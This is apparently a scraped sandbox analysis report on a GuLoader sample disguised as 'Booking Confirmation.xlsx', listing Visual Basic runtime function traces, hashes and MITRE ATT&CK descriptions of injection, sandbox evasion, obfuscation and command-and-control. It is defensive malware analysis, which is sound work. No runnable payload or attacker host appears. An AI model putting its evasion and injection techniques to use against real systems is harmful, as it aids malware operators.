Instruction Fuzzy Hash: 2E1186B4640704ABD710EF95CD46FAF76BCEB09744F10046AF411B7191D3BC6A0086A9

Uniqueness

Uniqueness Score: -1.00%

Function 00435754, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 87COMMON

Download Yara Rule

APIs

__vbaNew2.MSVBVM60(0043199C,`Sb), ref: 004357A4
__vbaObjSet.MSVBVM60(?,00000000), ref: 004357BC
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00432CF8,000001CC), ref: 00435826
__vbaFreeObj.MSVBVM60 ref: 0043582E

Strings

`Sb, xrefs: 0043578B, 0043579A, 004357A9

Memory Dump Source

Source File: 00000006.00000002.2365772167.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2365766403.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.2365800277.0000000000437000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.2365808830.0000000000438000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: __vba$CheckFreeHresultNew2
String ID: `Sb
API String ID: 1645334062-2243697873
Opcode ID: 31a3ac76d4c5d702b274ae540c102f50db41a1540cb756a18691436ad4936f5b
Instruction ID: e6124f0ace62f3f41fc6db8c97291a5c9a7b2bb54052bc93b1f63bd177861b1f
Opcode Fuzzy Hash: 31a3ac76d4c5d702b274ae540c102f50db41a1540cb756a18691436ad4936f5b
Instruction Fuzzy Hash: 13219FB1D00608AFCB04EFA9C945A9EBBB9EF09700F10842AF951FB2A1C77959058F95

Uniqueness

Uniqueness Score: -1.00%

Function 00435E35, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 53COMMON

Download Yara Rule

APIs

__vbaNew2.MSVBVM60(0043199C,`Sb,?,?,?,?,?,?,?,?,004012D6), ref: 00435E85
__vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,004012D6), ref: 00435E9D
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00432CF8,000001C0,?,?,?,?,?,?,?,?,004012D6), ref: 00435EBF
__vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,004012D6), ref: 00435EC7

Strings

`Sb, xrefs: 00435E6C, 00435E7B, 00435E8A

Memory Dump Source

Source File: 00000006.00000002.2365772167.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2365766403.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.2365800277.0000000000437000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.2365808830.0000000000438000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: __vba$CheckFreeHresultNew2
String ID: `Sb
API String ID: 1645334062-2243697873
Opcode ID: 46319103c04b378e960fc955cb90203a18b82ee3334d76c26b07d8faefe8ab90
Instruction ID: fbe9987e652e3cd95587eb4bb66624989f3f04d94c91e188d19f879de34bdb93
Opcode Fuzzy Hash: 46319103c04b378e960fc955cb90203a18b82ee3334d76c26b07d8faefe8ab90
Instruction Fuzzy Hash: 6E1182B4940604ABC710EF96C94AF9EBBBCFF58704F20546BF455E72A1C77C99018B98

Uniqueness

Uniqueness Score: -1.00%

Function 004359B8, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 50COMMON

Download Yara Rule

APIs

__vbaNew2.MSVBVM60(0043199C,`Sb), ref: 00435A08
__vbaObjSet.MSVBVM60(00000000,00000000), ref: 00435A20
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00432CF8,000001D4), ref: 00435A42
__vbaFreeObj.MSVBVM60 ref: 00435A4A

Strings

`Sb, xrefs: 004359F1, 004359FE, 00435A0D

Memory Dump Source

Source File: 00000006.00000002.2365772167.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2365766403.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.2365800277.0000000000437000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.2365808830.0000000000438000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: __vba$CheckFreeHresultNew2
String ID: `Sb
API String ID: 1645334062-2243697873
Opcode ID: 5a4ebd55e1a7cecab3bdea2abc723d11c024616357b2a97d59688bd8449cc207
Instruction ID: feb1c320441b9c756de60183dab80e48393f8c49a4c19eaccdb74a3a427bc2c7
Opcode Fuzzy Hash: 5a4ebd55e1a7cecab3bdea2abc723d11c024616357b2a97d59688bd8449cc207
Instruction Fuzzy Hash: 0611C4B4500208ABC710FFA5C98AF9B7BBCBF08748F10546AF441F72A2D77C99059B99

Uniqueness

Uniqueness Score: -1.00%

Function 00435F0B, Relevance: 7.6, APIs: 5, Instructions: 56COMMON

Download Yara Rule

APIs

__vbaLenBstrB.MSVBVM60(00432F6C,?,?,?,?,?,?,?,?,?,004012D6), ref: 00435F4D
__vbaNew2.MSVBVM60(00432E4C,0043746C,00432F6C,?,?,?,?,?,?,?,?,?,004012D6), ref: 00435F69
__vbaObjSetAddref.MSVBVM60(?,00401260,00432F6C,?,?,?,?,?,?,?,?,?,004012D6), ref: 00435F7E
__vbaHresultCheckObj.MSVBVM60(00000000,01D6F6F4,00432E3C,00000010,?,?,?,?,?,?,?,?,?,004012D6), ref: 00435F9A
__vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,004012D6), ref: 00435FA2

Memory Dump Source

Source File: 00000006.00000002.2365772167.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2365766403.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.2365800277.0000000000437000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.2365808830.0000000000438000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: __vba$AddrefBstrCheckFreeHresultNew2
String ID:
API String ID: 2151688750-0
Opcode ID: 12fbce1b6afda02874adb90daf74c81a4200553edfb13b1a4c6868db8bfb9fdf
Instruction ID: f088a1b97714f96a277f254c758952f17696a8f35fa282824895934c35169a81
Opcode Fuzzy Hash: 12fbce1b6afda02874adb90daf74c81a4200553edfb13b1a4c6868db8bfb9fdf
Instruction Fuzzy Hash: 51115170900608ABC710AF95C986E9FBBB8BF08704F60906FF505F32A1D37C65458F59

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject malicious code into process via Extra Window Memory (EWM) in order to evade process-based defenses as well as possibly elevate privileges. EWM injection is a method of executing arbitrary code in the address space of a separate live process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report Booking Confirmation.xlsx

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: GuLoader

Yara Overview

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Overview

Exploits:

System Summary:

Jbx Signature Overview

AV Detection:

Exploits:

Compliance:

Software Vulnerabilities:

Networking:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static OLE Info

General

OLE File "Booking Confirmation.xlsx"

Indicators

Streams

Stream Path: \x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace, File Type: data, Stream Size: 64

General

Stream Path: \x6DataSpaces/DataSpaceMap, File Type: data, Stream Size: 112

General

Stream Path: \x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary, File Type: data, Stream Size: 208

General

Stream Path: \x6DataSpaces/Version, File Type: data, Stream Size: 76

General